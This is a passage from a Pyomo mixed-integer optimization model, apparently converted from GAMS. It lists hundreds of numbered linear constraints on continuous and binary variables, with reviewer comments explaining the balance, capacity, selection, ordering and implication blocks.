m.c847 = Constraint(expr= m.x367 + m.x391 - 50*m.b787 <= 0)
m.c848 = Constraint(expr= m.x368 - 15*m.b788 <= 0)
m.c849 = Constraint(expr= m.x369 - 15*m.b789 <= 0)
m.c850 = Constraint(expr= m.x370 - 15*m.b790 <= 0)
m.c851 = Constraint(expr= m.x371 - 15*m.b791 <= 0)
m.c852 = Constraint(expr= m.x372 - 15*m.b792 <= 0)
m.c853 = Constraint(expr= m.x373 - 15*m.b793 <= 0)
m.c854 = Constraint(expr= m.x374 - 35*m.b794 <= 0)
m.c855 = Constraint(expr= m.x375 - 35*m.b795 <= 0)
m.c856 = Constraint(expr= m.x376 - 35*m.b796 <= 0)
m.c857 = Constraint(expr= m.x377 - 35*m.b797 <= 0)
m.c858 = Constraint(expr= m.x378 - 35*m.b798 <= 0)
m.c859 = Constraint(expr= m.x379 - 35*m.b799 <= 0)
# --- c860-c883: aggregation balances for x236-x259, each the sum of four
# components from the x608-x703 block (offsets +0,+3,+6,+9), e.g. c860
# forces x236 == x608 + x611 + x614 + x617.
m.c860 = Constraint(expr= m.x236 - m.x608 - m.x611 - m.x614 - m.x617 == 0)
m.c861 = Constraint(expr= m.x237 - m.x609 - m.x612 - m.x615 - m.x618 == 0)
m.c862 = Constraint(expr= m.x238 - m.x610 - m.x613 - m.x616 - m.x619 == 0)
m.c863 = Constraint(expr= m.x239 - m.x620 - m.x623 - m.x626 - m.x629 == 0)
m.c864 = Constraint(expr= m.x240 - m.x621 - m.x624 - m.x627 - m.x630 == 0)
m.c865 = Constraint(expr= m.x241 - m.x622 - m.x625 - m.x628 - m.x631 == 0)
m.c866 = Constraint(expr= m.x242 - m.x632 - m.x635 - m.x638 - m.x641 == 0)
m.c867 = Constraint(expr= m.x243 - m.x633 - m.x636 - m.x639 - m.x642 == 0)
m.c868 = Constraint(expr= m.x244 - m.x634 - m.x637 - m.x640 - m.x643 == 0)
m.c869 = Constraint(expr= m.x245 - m.x644 - m.x647 - m.x650 - m.x653 == 0)
m.c870 = Constraint(expr= m.x246 - m.x645 - m.x648 - m.x651 - m.x654 == 0)
m.c871 = Constraint(expr= m.x247 - m.x646 - m.x649 - m.x652 - m.x655 == 0)
m.c872 = Constraint(expr= m.x248 - m.x656 - m.x659 - m.x662 - m.x665 == 0)
m.c873 = Constraint(expr= m.x249 - m.x657 - m.x660 - m.x663 - m.x666 == 0)
m.c874 = Constraint(expr= m.x250 - m.x658 - m.x661 - m.x664 - m.x667 == 0)
m.c875 = Constraint(expr= m.x251 - m.x668 - m.x671 - m.x674 - m.x677 == 0)
m.c876 = Constraint(expr= m.x252 - m.x669 - m.x672 - m.x675 - m.x678 == 0)
m.c877 = Constraint(expr= m.x253 - m.x670 - m.x673 - m.x676 - m.x679 == 0)
m.c878 = Constraint(expr= m.x254 - m.x680 - m.x683 - m.x686 - m.x689 == 0)
m.c879 = Constraint(expr= m.x255 - m.x681 - m.x684 - m.x687 - m.x690 == 0)
m.c880 = Constraint(expr= m.x256 - m.x682 - m.x685 - m.x688 - m.x691 == 0)
m.c881 = Constraint(expr= m.x257 - m.x692 - m.x695 - m.x698 - m.x701 == 0)
m.c882 = Constraint(expr= m.x258 - m.x693 - m.x696 - m.x699 - m.x702 == 0)
m.c883 = Constraint(expr= m.x259 - m.x694 - m.x697 - m.x700 - m.x703 == 0)
# --- c884-c979 (continues into next section): binary-linked caps on
# x608-x703.  First member of each triple has no binary term (plain
# "x <= 0"; since the Var declarations visible at the top of the file use
# bounds=(0,None), this presumably pins those variables at 0 -- confirm
# the declared bounds of x608 onward).
m.c884 = Constraint(expr= m.x608 <= 0)
m.c885 = Constraint(expr= m.x609 <= 0)
m.c886 = Constraint(expr= m.x610 <= 0)
m.c887 = Constraint(expr= m.x611 - 6*m.b803 <= 0)
m.c888 = Constraint(expr= m.x612 - 4*m.b804 <= 0)
m.c889 = Constraint(expr= m.x613 - 3*m.b805 <= 0)
m.c890 = Constraint(expr= m.x614 - 40*m.b806 <= 0)
m.c891 = Constraint(expr= m.x615 - 35*m.b807 <= 0)
m.c892 = Constraint(expr= m.x616 - 20*m.b808 <= 0)
m.c893 = Constraint(expr= m.x617 - 46*m.b809 <= 0)
m.c894 = Constraint(expr= m.x618 - 39*m.b810 <= 0)
m.c895 = Constraint(expr= m.x619 - 23*m.b811 <= 0)
m.c896 = Constraint(expr= m.x620 <= 0)
m.c897 = Constraint(expr= m.x621 <= 0)
m.c898 = Constraint(expr= m.x622 <= 0)
m.c899 = Constraint(expr= m.x623 - 7*m.b815 <= 0)
m.c900 = Constraint(expr= m.x624 - 4*m.b816 <= 0)
m.c901 = Constraint(expr= m.x625 - 4*m.b817 <= 0)
m.c902 = Constraint(expr= m.x626 - 30*m.b818 <= 0)
m.c903 = Constraint(expr= m.x627 - 25*m.b819 <= 0)
m.c904 = Constraint(expr= m.x628 - 20*m.b820 <= 0)
m.c905 = Constraint(expr= m.x629 - 37*m.b821 <= 0)
m.c906 = Constraint(expr= m.x630 - 29*m.b822 <= 0)
m.c907 = Constraint(expr= m.x631 - 22*m.b823 <= 0)
m.c908 = Constraint(expr= m.x632 <= 0)
m.c909 = Constraint(expr= m.x633 <= 0)
m.c910 = Constraint(expr= m.x634 <= 0)
m.c911 = Constraint(expr= m.x635 - 7*m.b827 <= 0)
m.c912 = Constraint(expr= m.x636 - 5*m.b828 <= 0)
m.c913 = Constraint(expr= m.x637 - 3*m.b829 <= 0)
m.c914 = Constraint(expr= m.x638 - 15*m.b830 <= 0)
m.c915 = Constraint(expr= m.x639 - 5*m.b831 <= 0)
m.c916 = Constraint(expr= m.x640 - 2*m.b832 <= 0)
m.c917 = Constraint(expr= m.x641 - 22*m.b833 <= 0)
m.c918 = Constraint(expr= m.x642 - 10*m.b834 <= 0)
m.c919 = Constraint(expr= m.x643 - 5*m.b835 <= 0)
m.c920 = Constraint(expr= m.x644 <= 0)
m.c921 = Constraint(expr= m.x645 <= 0)
m.c922 = Constraint(expr= m.x646 <= 0)
m.c923 = Constraint(expr= m.x647 - 11*m.b839 <= 0)
m.c924 = Constraint(expr= m.x648 - 8*m.b840 <= 0)
m.c925 = Constraint(expr= m.x649 - 6*m.b841 <= 0)
m.c926 = Constraint(expr= m.x650 - 13*m.b842 <= 0)
m.c927 = Constraint(expr= m.x651 - 8*m.b843 <= 0)
m.c928 = Constraint(expr= m.x652 - 3*m.b844 <= 0)
m.c929 = Constraint(expr= m.x653 - 24*m.b845 <= 0)
m.c930 = Constraint(expr= m.x654 - 16*m.b846 <= 0)
m.c931 = Constraint(expr= m.x655 - 9*m.b847 <= 0)
m.c932 = Constraint(expr= m.x656 <= 0)
m.c933 = Constraint(expr= m.x657 <= 0)
m.c934 = Constraint(expr= m.x658 <= 0)
m.c935 = Constraint(expr= m.x659 - 10*m.b851 <= 0)
m.c936 = Constraint(expr= m.x660 - 7*m.b852 <= 0)
m.c937 = Constraint(expr= m.x661 - 6*m.b853 <= 0)
m.c938 = Constraint(expr= m.x662 - 13*m.b854 <= 0)
m.c939 = Constraint(expr= m.x663 - 8*m.b855 <= 0)
m.c940 = Constraint(expr= m.x664 - 3*m.b856 <= 0)
m.c941 = Constraint(expr= m.x665 - 23*m.b857 <= 0)
m.c942 = Constraint(expr= m.x666 - 15*m.b858 <= 0)
m.c943 = Constraint(expr= m.x667 - 9*m.b859 <= 0)
m.c944 = Constraint(expr= m.x668 <= 0)
m.c945 = Constraint(expr= m.x669 <= 0)
m.c946 = Constraint(expr= m.x670 <= 0)
m.c947 = Constraint(expr= m.x671 - 9*m.b863 <= 0)
m.c948 = Constraint(expr= m.x672 - 9*m.b864 <= 0)
m.c949 = Constraint(expr= m.x673 - 7*m.b865 <= 0)
m.c950 = Constraint(expr= m.x674 - 30*m.b866 <= 0)
m.c951 = Constraint(expr= m.x675 - 30*m.b867 <= 0)
m.c952 = Constraint(expr= m.x676 - 25*m.b868 <= 0)
m.c953 = Constraint(expr= m.x677 - 39*m.b869 <= 0)
m.c954 = Constraint(expr= m.x678 - 39*m.b870 <= 0)
m.c955 = Constraint(expr= m.x679 - 32*m.b871 <= 0)
m.c956 = Constraint(expr= m.x680 <= 0)
# --- c957-c979: tail of the x608-x703 cap set started at c884.
m.c957 = Constraint(expr= m.x681 <= 0)
m.c958 = Constraint(expr= m.x682 <= 0)
m.c959 = Constraint(expr= m.x683 - 8*m.b875 <= 0)
m.c960 = Constraint(expr= m.x684 - 7*m.b876 <= 0)
m.c961 = Constraint(expr= m.x685 - 7*m.b877 <= 0)
m.c962 = Constraint(expr= m.x686 - 20*m.b878 <= 0)
m.c963 = Constraint(expr= m.x687 - 15*m.b879 <= 0)
m.c964 = Constraint(expr= m.x688 - 10*m.b880 <= 0)
m.c965 = Constraint(expr= m.x689 - 28*m.b881 <= 0)
m.c966 = Constraint(expr= m.x690 - 22*m.b882 <= 0)
m.c967 = Constraint(expr= m.x691 - 17*m.b883 <= 0)
m.c968 = Constraint(expr= m.x692 <= 0)
m.c969 = Constraint(expr= m.x693 <= 0)
m.c970 = Constraint(expr= m.x694 <= 0)
m.c971 = Constraint(expr= m.x695 - 8*m.b887 <= 0)
m.c972 = Constraint(expr= m.x696 - 6*m.b888 <= 0)
m.c973 = Constraint(expr= m.x697 - 5*m.b889 <= 0)
m.c974 = Constraint(expr= m.x698 - 15*m.b890 <= 0)
m.c975 = Constraint(expr= m.x699 - 10*m.b891 <= 0)
m.c976 = Constraint(expr= m.x700 - 6*m.b892 <= 0)
m.c977 = Constraint(expr= m.x701 - 23*m.b893 <= 0)
m.c978 = Constraint(expr= m.x702 - 16*m.b894 <= 0)
m.c979 = Constraint(expr= m.x703 - 11*m.b895 <= 0)
# --- c980-c1075: EQUALITY versions of c884-c979 -- identical expressions,
# "== 0" instead of "<= 0", forcing x == M*b exactly (all-or-nothing).
# NOTE(review): these make the corresponding inequalities c884-c979
# redundant; this duplication is typical of mechanical GAMS conversion --
# leave as generated rather than "fixing" by hand.
m.c980 = Constraint(expr= m.x608 == 0)
m.c981 = Constraint(expr= m.x609 == 0)
m.c982 = Constraint(expr= m.x610 == 0)
m.c983 = Constraint(expr= m.x611 - 6*m.b803 == 0)
m.c984 = Constraint(expr= m.x612 - 4*m.b804 == 0)
m.c985 = Constraint(expr= m.x613 - 3*m.b805 == 0)
m.c986 = Constraint(expr= m.x614 - 40*m.b806 == 0)
m.c987 = Constraint(expr= m.x615 - 35*m.b807 == 0)
m.c988 = Constraint(expr= m.x616 - 20*m.b808 == 0)
m.c989 = Constraint(expr= m.x617 - 46*m.b809 == 0)
m.c990 = Constraint(expr= m.x618 - 39*m.b810 == 0)
m.c991 = Constraint(expr= m.x619 - 23*m.b811 == 0)
m.c992 = Constraint(expr= m.x620 == 0)
m.c993 = Constraint(expr= m.x621 == 0)
m.c994 = Constraint(expr= m.x622 == 0)
m.c995 = Constraint(expr= m.x623 - 7*m.b815 == 0)
m.c996 = Constraint(expr= m.x624 - 4*m.b816 == 0)
m.c997 = Constraint(expr= m.x625 - 4*m.b817 == 0)
m.c998 = Constraint(expr= m.x626 - 30*m.b818 == 0)
m.c999 = Constraint(expr= m.x627 - 25*m.b819 == 0)
m.c1000 = Constraint(expr= m.x628 - 20*m.b820 == 0)
m.c1001 = Constraint(expr= m.x629 - 37*m.b821 == 0)
m.c1002 = Constraint(expr= m.x630 - 29*m.b822 == 0)
m.c1003 = Constraint(expr= m.x631 - 22*m.b823 == 0)
m.c1004 = Constraint(expr= m.x632 == 0)
m.c1005 = Constraint(expr= m.x633 == 0)
m.c1006 = Constraint(expr= m.x634 == 0)
m.c1007 = Constraint(expr= m.x635 - 7*m.b827 == 0)
m.c1008 = Constraint(expr= m.x636 - 5*m.b828 == 0)
m.c1009 = Constraint(expr= m.x637 - 3*m.b829 == 0)
m.c1010 = Constraint(expr= m.x638 - 15*m.b830 == 0)
m.c1011 = Constraint(expr= m.x639 - 5*m.b831 == 0)
m.c1012 = Constraint(expr= m.x640 - 2*m.b832 == 0)
m.c1013 = Constraint(expr= m.x641 - 22*m.b833 == 0)
m.c1014 = Constraint(expr= m.x642 - 10*m.b834 == 0)
m.c1015 = Constraint(expr= m.x643 - 5*m.b835 == 0)
m.c1016 = Constraint(expr= m.x644 == 0)
m.c1017 = Constraint(expr= m.x645 == 0)
m.c1018 = Constraint(expr= m.x646 == 0)
m.c1019 = Constraint(expr= m.x647 - 11*m.b839 == 0)
m.c1020 = Constraint(expr= m.x648 - 8*m.b840 == 0)
m.c1021 = Constraint(expr= m.x649 - 6*m.b841 == 0)
m.c1022 = Constraint(expr= m.x650 - 13*m.b842 == 0)
m.c1023 = Constraint(expr= m.x651 - 8*m.b843 == 0)
m.c1024 = Constraint(expr= m.x652 - 3*m.b844 == 0)
m.c1025 = Constraint(expr= m.x653 - 24*m.b845 == 0)
m.c1026 = Constraint(expr= m.x654 - 16*m.b846 == 0)
m.c1027 = Constraint(expr= m.x655 - 9*m.b847 == 0)
m.c1028 = Constraint(expr= m.x656 == 0)
m.c1029 = Constraint(expr= m.x657 == 0)
m.c1030 = Constraint(expr= m.x658 == 0)
m.c1031 = Constraint(expr= m.x659 - 10*m.b851 == 0)
m.c1032 = Constraint(expr= m.x660 - 7*m.b852 == 0)
m.c1033 = Constraint(expr= m.x661 - 6*m.b853 == 0)
m.c1034 = Constraint(expr= m.x662 - 13*m.b854 == 0)
m.c1035 = Constraint(expr= m.x663 - 8*m.b855 == 0)
m.c1036 = Constraint(expr= m.x664 - 3*m.b856 == 0)
m.c1037 = Constraint(expr= m.x665 - 23*m.b857 == 0)
m.c1038 = Constraint(expr= m.x666 - 15*m.b858 == 0)
m.c1039 = Constraint(expr= m.x667 - 9*m.b859 == 0)
m.c1040 = Constraint(expr= m.x668 == 0)
m.c1041 = Constraint(expr= m.x669 == 0)
m.c1042 = Constraint(expr= m.x670 == 0)
m.c1043 = Constraint(expr= m.x671 - 9*m.b863 == 0)
m.c1044 = Constraint(expr= m.x672 - 9*m.b864 == 0)
m.c1045 = Constraint(expr= m.x673 - 7*m.b865 == 0)
m.c1046 = Constraint(expr= m.x674 - 30*m.b866 == 0)
m.c1047 = Constraint(expr= m.x675 - 30*m.b867 == 0)
m.c1048 = Constraint(expr= m.x676 - 25*m.b868 == 0)
m.c1049 = Constraint(expr= m.x677 - 39*m.b869 == 0)
m.c1050 = Constraint(expr= m.x678 - 39*m.b870 == 0)
m.c1051 = Constraint(expr= m.x679 - 32*m.b871 == 0)
m.c1052 = Constraint(expr= m.x680 == 0)
m.c1053 = Constraint(expr= m.x681 == 0)
m.c1054 = Constraint(expr= m.x682 == 0)
m.c1055 = Constraint(expr= m.x683 - 8*m.b875 == 0)
m.c1056 = Constraint(expr= m.x684 - 7*m.b876 == 0)
m.c1057 = Constraint(expr= m.x685 - 7*m.b877 == 0)
m.c1058 = Constraint(expr= m.x686 - 20*m.b878 == 0)
m.c1059 = Constraint(expr= m.x687 - 15*m.b879 == 0)
m.c1060 = Constraint(expr= m.x688 - 10*m.b880 == 0)
m.c1061 = Constraint(expr= m.x689 - 28*m.b881 == 0)
m.c1062 = Constraint(expr= m.x690 - 22*m.b882 == 0)
m.c1063 = Constraint(expr= m.x691 - 17*m.b883 == 0)
m.c1064 = Constraint(expr= m.x692 == 0)
m.c1065 = Constraint(expr= m.x693 == 0)
m.c1066 = Constraint(expr= m.x694 == 0)
m.c1067 = Constraint(expr= m.x695 - 8*m.b887 == 0)
m.c1068 = Constraint(expr= m.x696 - 6*m.b888 == 0)
m.c1069 = Constraint(expr= m.x697 - 5*m.b889 == 0)
m.c1070 = Constraint(expr= m.x698 - 15*m.b890 == 0)
m.c1071 = Constraint(expr= m.x699 - 10*m.b891 == 0)
m.c1072 = Constraint(expr= m.x700 - 6*m.b892 == 0)
m.c1073 = Constraint(expr= m.x701 - 23*m.b893 == 0)
m.c1074 = Constraint(expr= m.x702 - 16*m.b894 == 0)
m.c1075 = Constraint(expr= m.x703 - 11*m.b895 == 0)
# --- c1076-c1078: three aggregate budget/capacity inequalities mixing
# weighted x2-x88 terms with unit-coefficient x236-x259 terms.
m.c1076 = Constraint(expr= 20*m.x2 + 20*m.x17 + 18*m.x29 + 16*m.x65 + 20*m.x86 + m.x236 + m.x239 + m.x242 + m.x245 + m.x248 + m.x251 + m.x254 + m.x257 <= 4000)
m.c1077 = Constraint(expr= 17*m.x3 + 21*m.x18 + 20*m.x30 + 19*m.x66 + 18*m.x87 + m.x237 + m.x240 + m.x243 + m.x246 + m.x249 + m.x252 + m.x255 + m.x258 <= 3800)
m.c1078 = Constraint(expr= 15*m.x4 + 19*m.x19 + 20*m.x31 + 17*m.x67 + 21*m.x88 + m.x238 + m.x241 + m.x244 + m.x247 + m.x250 + m.x253 + m.x256 + m.x259 <= 3600)
# --- c1079-c1126: pick-exactly-one equalities -- each sums a group of four
# binaries (spaced 3 apart) to 1, e.g. b704 + b707 + b710 + b713 == 1.
m.c1079 = Constraint(expr= m.b704 + m.b707 + m.b710 + m.b713 == 1)
m.c1080 = Constraint(expr= m.b705 + m.b708 + m.b711 + m.b714 == 1)
m.c1081 = Constraint(expr= m.b706 + m.b709 + m.b712 + m.b715 == 1)
m.c1082 = Constraint(expr= m.b716 + m.b719 + m.b722 + m.b725 == 1)
m.c1083 = Constraint(expr= m.b717 + m.b720 + m.b723 + m.b726 == 1)
m.c1084 = Constraint(expr= m.b718 + m.b721 + m.b724 + m.b727 == 1)
m.c1085 = Constraint(expr= m.b728 + m.b731 + m.b734 + m.b737 == 1)
m.c1086 = Constraint(expr= m.b729 + m.b732 + m.b735 + m.b738 == 1)
m.c1087 = Constraint(expr= m.b730 + m.b733 + m.b736 + m.b739 == 1)
m.c1088 = Constraint(expr= m.b740 + m.b743 + m.b746 + m.b749 == 1)
m.c1089 = Constraint(expr= m.b741 + m.b744 + m.b747 + m.b750 == 1)
m.c1090 = Constraint(expr= m.b742 + m.b745 + m.b748 + m.b751 == 1)
m.c1091 = Constraint(expr= m.b752 + m.b755 + m.b758 + m.b761 == 1)
m.c1092 = Constraint(expr= m.b753 + m.b756 + m.b759 + m.b762 == 1)
m.c1093 = Constraint(expr= m.b754 + m.b757 + m.b760 + m.b763 == 1)
m.c1094 = Constraint(expr= m.b764 + m.b767 + m.b770 + m.b773 == 1)
m.c1095 = Constraint(expr= m.b765 + m.b768 + m.b771 + m.b774 == 1)
m.c1096 = Constraint(expr= m.b766 + m.b769 + m.b772 + m.b775 == 1)
m.c1097 = Constraint(expr= m.b776 + m.b779 + m.b782 + m.b785 == 1)
m.c1098 = Constraint(expr= m.b777 + m.b780 + m.b783 + m.b786 == 1)
m.c1099 = Constraint(expr= m.b778 + m.b781 + m.b784 + m.b787 == 1)
m.c1100 = Constraint(expr= m.b788 + m.b791 + m.b794 + m.b797 == 1)
m.c1101 = Constraint(expr= m.b789 + m.b792 + m.b795 + m.b798 == 1)
m.c1102 = Constraint(expr= m.b790 + m.b793 + m.b796 + m.b799 == 1)
m.c1103 = Constraint(expr= m.b800 + m.b803 + m.b806 + m.b809 == 1)
m.c1104 = Constraint(expr= m.b801 + m.b804 + m.b807 + m.b810 == 1)
m.c1105 = Constraint(expr= m.b802 + m.b805 + m.b808 + m.b811 == 1)
m.c1106 = Constraint(expr= m.b812 + m.b815 + m.b818 + m.b821 == 1)
m.c1107 = Constraint(expr= m.b813 + m.b816 + m.b819 + m.b822 == 1)
m.c1108 = Constraint(expr= m.b814 + m.b817 + m.b820 + m.b823 == 1)
m.c1109 = Constraint(expr= m.b824 + m.b827 + m.b830 + m.b833 == 1)
m.c1110 = Constraint(expr= m.b825 + m.b828 + m.b831 + m.b834 == 1)
m.c1111 = Constraint(expr= m.b826 + m.b829 + m.b832 + m.b835 == 1)
m.c1112 = Constraint(expr= m.b836 + m.b839 + m.b842 + m.b845 == 1)
m.c1113 = Constraint(expr= m.b837 + m.b840 + m.b843 + m.b846 == 1)
m.c1114 = Constraint(expr= m.b838 + m.b841 + m.b844 + m.b847 == 1)
m.c1115 = Constraint(expr= m.b848 + m.b851 + m.b854 + m.b857 == 1)
m.c1116 = Constraint(expr= m.b849 + m.b852 + m.b855 + m.b858 == 1)
m.c1117 = Constraint(expr= m.b850 + m.b853 + m.b856 + m.b859 == 1)
m.c1118 = Constraint(expr= m.b860 + m.b863 + m.b866 + m.b869 == 1)
m.c1119 = Constraint(expr= m.b861 + m.b864 + m.b867 + m.b870 == 1)
m.c1120 = Constraint(expr= m.b862 + m.b865 + m.b868 + m.b871 == 1)
m.c1121 = Constraint(expr= m.b872 + m.b875 + m.b878 + m.b881 == 1)
m.c1122 = Constraint(expr= m.b873 + m.b876 + m.b879 + m.b882 == 1)
m.c1123 = Constraint(expr= m.b874 + m.b877 + m.b880 + m.b883 == 1)
m.c1124 = Constraint(expr= m.b884 + m.b887 + m.b890 + m.b893 == 1)
m.c1125 = Constraint(expr= m.b885 + m.b888 + m.b891 + m.b894 == 1)
m.c1126 = Constraint(expr= m.b886 + m.b889 + m.b892 + m.b895 == 1)
# --- c1127-c1198: ordering inequalities within binary triples
# (b_k - b_{k+1} <= 0, i.e. b_k <= b_{k+1} <= b_{k+2}).  The pattern is
# consistent with symmetry-breaking among identical choices, but the
# intent is not recoverable from the generated code -- TODO confirm
# against the source GAMS model.
m.c1127 = Constraint(expr= m.b707 - m.b708 <= 0)
m.c1128 = Constraint(expr= m.b707 - m.b709 <= 0)
m.c1129 = Constraint(expr= m.b708 - m.b709 <= 0)
m.c1130 = Constraint(expr= m.b710 - m.b711 <= 0)
m.c1131 = Constraint(expr= m.b710 - m.b712 <= 0)
m.c1132 = Constraint(expr= m.b711 - m.b712 <= 0)
m.c1133 = Constraint(expr= m.b713 - m.b714 <= 0)
m.c1134 = Constraint(expr= m.b713 - m.b715 <= 0)
m.c1135 = Constraint(expr= m.b714 - m.b715 <= 0)
m.c1136 = Constraint(expr= m.b719 - m.b720 <= 0)
m.c1137 = Constraint(expr= m.b719 - m.b721 <= 0)
m.c1138 = Constraint(expr= m.b720 - m.b721 <= 0)
m.c1139 = Constraint(expr= m.b722 - m.b723 <= 0)
m.c1140 = Constraint(expr= m.b722 - m.b724 <= 0)
m.c1141 = Constraint(expr= m.b723 - m.b724 <= 0)
m.c1142 = Constraint(expr= m.b725 - m.b726 <= 0)
m.c1143 = Constraint(expr= m.b725 - m.b727 <= 0)
m.c1144 = Constraint(expr= m.b726 - m.b727 <= 0)
m.c1145 = Constraint(expr= m.b731 - m.b732 <= 0)
m.c1146 = Constraint(expr= m.b731 - m.b733 <= 0)
m.c1147 = Constraint(expr= m.b732 - m.b733 <= 0)
m.c1148 = Constraint(expr= m.b734 - m.b735 <= 0)
m.c1149 = Constraint(expr= m.b734 - m.b736 <= 0)
m.c1150 = Constraint(expr= m.b735 - m.b736 <= 0)
m.c1151 = Constraint(expr= m.b737 - m.b738 <= 0)
m.c1152 = Constraint(expr= m.b737 - m.b739 <= 0)
m.c1153 = Constraint(expr= m.b738 - m.b739 <= 0)
m.c1154 = Constraint(expr= m.b743 - m.b744 <= 0)
m.c1155 = Constraint(expr= m.b743 - m.b745 <= 0)
m.c1156 = Constraint(expr= m.b744 - m.b745 <= 0)
m.c1157 = Constraint(expr= m.b746 - m.b747 <= 0)
m.c1158 = Constraint(expr= m.b746 - m.b748 <= 0)
m.c1159 = Constraint(expr= m.b747 - m.b748 <= 0)
m.c1160 = Constraint(expr= m.b749 - m.b750 <= 0)
m.c1161 = Constraint(expr= m.b749 - m.b751 <= 0)
m.c1162 = Constraint(expr= m.b750 - m.b751 <= 0)
m.c1163 = Constraint(expr= m.b755 - m.b756 <= 0)
m.c1164 = Constraint(expr= m.b755 - m.b757 <= 0)
m.c1165 = Constraint(expr= m.b756 - m.b757 <= 0)
m.c1166 = Constraint(expr= m.b758 - m.b759 <= 0)
m.c1167 = Constraint(expr= m.b758 - m.b760 <= 0)
m.c1168 = Constraint(expr= m.b759 - m.b760 <= 0)
m.c1169 = Constraint(expr= m.b761 - m.b762 <= 0)
m.c1170 = Constraint(expr= m.b761 - m.b763 <= 0)
m.c1171 = Constraint(expr= m.b762 - m.b763 <= 0)
m.c1172 = Constraint(expr= m.b767 - m.b768 <= 0)
m.c1173 = Constraint(expr= m.b767 - m.b769 <= 0)
m.c1174 = Constraint(expr= m.b768 - m.b769 <= 0)
m.c1175 = Constraint(expr= m.b770 - m.b771 <= 0)
m.c1176 = Constraint(expr= m.b770 - m.b772 <= 0)
m.c1177 = Constraint(expr= m.b771 - m.b772 <= 0)
m.c1178 = Constraint(expr= m.b773 - m.b774 <= 0)
m.c1179 = Constraint(expr= m.b773 - m.b775 <= 0)
m.c1180 = Constraint(expr= m.b774 - m.b775 <= 0)
m.c1181 = Constraint(expr= m.b779 - m.b780 <= 0)
m.c1182 = Constraint(expr= m.b779 - m.b781 <= 0)
m.c1183 = Constraint(expr= m.b780 - m.b781 <= 0)
m.c1184 = Constraint(expr= m.b782 - m.b783 <= 0)
m.c1185 = Constraint(expr= m.b782 - m.b784 <= 0)
m.c1186 = Constraint(expr= m.b783 - m.b784 <= 0)
m.c1187 = Constraint(expr= m.b785 - m.b786 <= 0)
m.c1188 = Constraint(expr= m.b785 - m.b787 <= 0)
m.c1189 = Constraint(expr= m.b786 - m.b787 <= 0)
m.c1190 = Constraint(expr= m.b791 - m.b792 <= 0)
m.c1191 = Constraint(expr= m.b791 - m.b793 <= 0)
m.c1192 = Constraint(expr= m.b792 - m.b793 <= 0)
m.c1193 = Constraint(expr= m.b794 - m.b795 <= 0)
m.c1194 = Constraint(expr= m.b794 - m.b796 <= 0)
m.c1195 = Constraint(expr= m.b795 - m.b796 <= 0)
m.c1196 = Constraint(expr= m.b797 - m.b798 <= 0)
m.c1197 = Constraint(expr= m.b797 - m.b799 <= 0)
m.c1198 = Constraint(expr= m.b798 - m.b799 <= 0)
# --- c1199-c1217...: implication inequalities  b_k <= b_a  (written
# -b_a + b_k <= 0): each of b803-b811 is allowed only when the two
# members of {b800, b801, b802} other than its own column are selected.
m.c1199 = Constraint(expr= - m.b801 + m.b803 <= 0)
m.c1200 = Constraint(expr= - m.b802 + m.b803 <= 0)
m.c1201 = Constraint(expr= - m.b800 + m.b804 <= 0)
m.c1202 = Constraint(expr= - m.b802 + m.b804 <= 0)
m.c1203 = Constraint(expr= - m.b800 + m.b805 <= 0)
m.c1204 = Constraint(expr= - m.b801 + m.b805 <= 0)
m.c1205 = Constraint(expr= - m.b801 + m.b806 <= 0)
m.c1206 = Constraint(expr= - m.b802 + m.b806 <= 0)
m.c1207 = Constraint(expr= - m.b800 + m.b807 <= 0)
m.c1208 = Constraint(expr= - m.b802 + m.b807 <= 0)
m.c1209 = Constraint(expr= - m.b800 + m.b808 <= 0)
m.c1210 = Constraint(expr= - m.b801 + m.b808 <= 0)
m.c1211 = Constraint(expr= - m.b801 + m.b809 <= 0)
m.c1212 = Constraint(expr= - m.b802 + m.b809 <= 0)
m.c1213 = Constraint(expr= - m.b800 + m.b810 <= 0)
m.c1214 = Constraint(expr= - m.b802 + m.b810 <= 0)
m.c1215 = Constraint(expr= - m.b800 + m.b811 <= 0)
m.c1216 = Constraint(expr= - m.b801 + m.b811 <= 0)
m.c1217 = Constraint(expr= - m.b813 + m.b815 <= 0)
m.c1218 = Constraint(expr= - m.b814
+ m.b815 <= 0) m.c1219 = Constraint(expr= - m.b812 + m.b816 <= 0) m.c1220 = Constraint(expr= - m.b814 + m.b816 <= 0) m.c1221 = Constraint(expr= - m.b812 + m.b817 <= 0) m.c1222 = Constraint(expr= - m.b813 + m.b817 <= 0) m.c1223 = Constraint(expr= - m.b813 + m.b818 <= 0) m.c1224 = Constraint(expr= - m.b814 + m.b818 <= 0) m.c1225 = Constraint(expr= - m.b812 + m.b819 <= 0) m.c1226 = Constraint(expr= - m.b814 + m.b819 <= 0) m.c1227 = Constraint(expr= - m.b812 + m.b820 <= 0) m.c1228 = Constraint(expr= - m.b813 + m.b820 <= 0) m.c1229 = Constraint(expr= - m.b813 + m.b821 <= 0) m.c1230 = Constraint(expr= - m.b814 + m.b821 <= 0) m.c1231 = Constraint(expr= - m.b812 + m.b822 <= 0) m.c1232 = Constraint(expr= - m.b814 + m.b822 <= 0) m.c1233 = Constraint(expr= - m.b812 + m.b823 <= 0) m.c1234 = Constraint(expr= - m.b813 + m.b823 <= 0) m.c1235 = Constraint(expr= - m.b825 + m.b827 <= 0) m.c1236 = Constraint(expr= - m.b826 + m.b827 <= 0) m.c1237 = Constraint(expr= - m.b824 + m.b828 <= 0) m.c1238 = Constraint(expr= - m.b826 + m.b828 <= 0) m.c1239 = Constraint(expr= - m.b824 + m.b829 <= 0) m.c1240 = Constraint(expr= - m.b825 + m.b829 <= 0) m.c1241 = Constraint(expr= - m.b825 + m.b830 <= 0) m.c1242 = Constraint(expr= - m.b826 + m.b830 <= 0) m.c1243 = Constraint(expr= - m.b824 + m.b831 <= 0) m.c1244 = Constraint(expr= - m.b826 + m.b831 <= 0) m.c1245 = Constraint(expr= - m.b824 + m.b832 <= 0) m.c1246 = Constraint(expr= - m.b825 + m.b832 <= 0) m.c1247 = Constraint(expr= - m.b825 + m.b833 <= 0) m.c1248 = Constraint(expr= - m.b826 + m.b833 <= 0) m.c1249 = Constraint(expr= - m.b824 + m.b834 <= 0) m.c1250 = Constraint(expr= - m.b826 + m.b834 <= 0) m.c1251 = Constraint(expr= - m.b824 + m.b835 <= 0) m.c1252 = Constraint(expr= - m.b825 + m.b835 <= 0) m.c1253 = Constraint(expr= - m.b837 + m.b839 <= 0) m.c1254 = Constraint(expr= - m.b838 + m.b839 <= 0) m.c1255 = Constraint(expr= - m.b836 + m.b840 <= 0) m.c1256 = Constraint(expr= - m.b838 + m.b840 <= 0) m.c1257 = Constraint(expr= 